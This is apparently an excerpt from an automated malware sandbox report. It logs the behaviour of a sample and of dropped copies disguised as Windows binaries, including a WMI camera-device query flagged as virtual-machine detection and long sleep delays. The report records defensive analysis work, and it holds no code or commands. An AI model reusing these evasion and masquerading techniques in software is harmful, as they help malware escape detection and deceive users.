                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeMemory allocated: A20000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeMemory allocated: 1A580000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeMemory allocated: 1ACD0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeMemory allocated: 1B0D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeMemory allocated: F00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeMemory allocated: 1A990000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeMemory allocated: 13D0000 memory reserve | memory write watch
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeMemory allocated: 2CE0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeMemory allocated: 1ACE0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeMemory allocated: 3300000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeMemory allocated: 1B300000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeMemory allocated: A60000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeMemory allocated: 1210000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeMemory allocated: 1ABC0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 3600000Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599859Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599749Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599640Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599531Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599421Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599311Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599187Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599078Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598968Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598859Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598750Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598630Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598500Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598390Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598275Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598156Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598031Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597861Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597745Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597640Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597515Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597406Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597296Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597187Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597078Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596967Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596858Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596734Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596625Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596515Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596390Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596277Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596171Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596062Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595953Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595834Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595718Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595609Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595499Jump to behavior
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWindow / User API: threadDelayed 1382Jump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWindow / User API: threadDelayed 705Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeWindow / User API: threadDelayed 368Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeWindow / User API: threadDelayed 367Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeWindow / User API: threadDelayed 3141Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeWindow / User API: threadDelayed 6630Jump to behavior
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeWindow / User API: threadDelayed 366
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeWindow / User API: threadDelayed 368
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeWindow / User API: threadDelayed 369
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeWindow / User API: threadDelayed 364
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe TID: 7344Thread sleep count: 1382 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe TID: 7336Thread sleep count: 705 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe TID: 7320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe TID: 2004Thread sleep count: 368 > 30Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe TID: 7880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe TID: 344Thread sleep count: 367 > 30Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe TID: 7884Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -3600000s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599859s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599749s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599640s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599531s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599421s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599311s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599187s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599078s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598968s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598859s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598750s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598630s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598500s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598390s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598275s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598156s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598031s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597861s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597745s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597640s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597515s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597406s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597296s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597187s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597078s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596967s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596858s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596734s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596625s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596515s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596390s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596277s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596171s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596062s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -595953s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -595834s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -595718s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -595609s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -595499s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 5104Thread sleep count: 320 > 30
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 4180Thread sleep count: 49 > 30
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe TID: 5040Thread sleep count: 366 > 30
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe TID: 7956Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe TID: 8184Thread sleep count: 368 > 30
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe TID: 8132Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe TID: 6120Thread sleep count: 369 > 30
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe TID: 4600Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe TID: 928Thread sleep count: 364 > 30
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe TID: 3604Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 3600000Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599859Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599749Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599640Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599531Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599421Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599311Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599187Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599078Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598968Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598859Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598750Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598630Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598500Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598390Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598275Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598156Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598031Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597861Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597745Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597640Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597515Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597406Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597296Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597187Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597078Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596967Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596858Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596734Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596625Jump to behavior
